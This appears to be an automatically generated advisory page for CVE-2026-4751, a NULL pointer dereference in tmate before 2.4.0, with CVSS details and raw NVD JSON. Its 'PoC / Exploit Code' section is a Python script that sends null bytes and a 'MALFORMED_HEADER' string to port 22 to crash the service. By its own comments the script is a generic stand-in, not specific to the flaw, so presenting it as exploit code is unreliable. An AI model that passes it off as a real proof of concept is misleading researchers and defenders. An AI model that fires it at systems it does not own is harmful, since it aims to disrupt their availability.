Security Vulnerability Report
中文
CVE-2026-4751 CVSS 5.3 MEDIUM

CVE-2026-4751

Published: 2026-03-24 06:16:23
Last Modified: 2026-03-24 15:53:48

Description

NULL Pointer Dereference vulnerability in tmate-io tmate.This issue affects tmate: before 2.4.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

tmate < 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import sys # Target configuration TARGET_HOST = "127.0.0.1" TARGET_PORT = 22 # tmate typically uses SSH port def send_malformed_packet(): """ Conceptual PoC for triggering Null Pointer Dereference. Sends a crafted packet to the target service. """ try: # Establish TCP connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((TARGET_HOST, TARGET_PORT)) print(f"[+] Connected to {TARGET_HOST}:{TARGET_PORT}") # Construct a payload designed to hit the null pointer logic # Note: This is a generic example. Specific offset/bytes depend on the vulnerability. # Sending a sequence of null bytes or malformed protocol headers. payload = b"\x00" * 100 + b"MALFORMED_HEADER" s.send(payload) print("[+] Malformed payload sent.") # Attempt to read response (if any) to confirm crash or hang response = s.recv(1024) print("[+] Received response (might indicate failure to crash)") s.close() except ConnectionResetError: print("[!] Connection reset by peer. Possible crash.") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": send_malformed_packet()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4751", "sourceIdentifier": "[email protected]", "published": "2026-03-24T06:16:23.407", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NULL Pointer Dereference vulnerability in tmate-io tmate.This issue affects tmate: before 2.4.0."}, {"lang": "es", "value": "Vulnerabilidad de desreferencia de puntero NULL en tmate-io tmate. Este problema afecta a tmate: antes de 2.4.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/tmate-io/tmate/pull/328", "source": "[email protected]"}]}}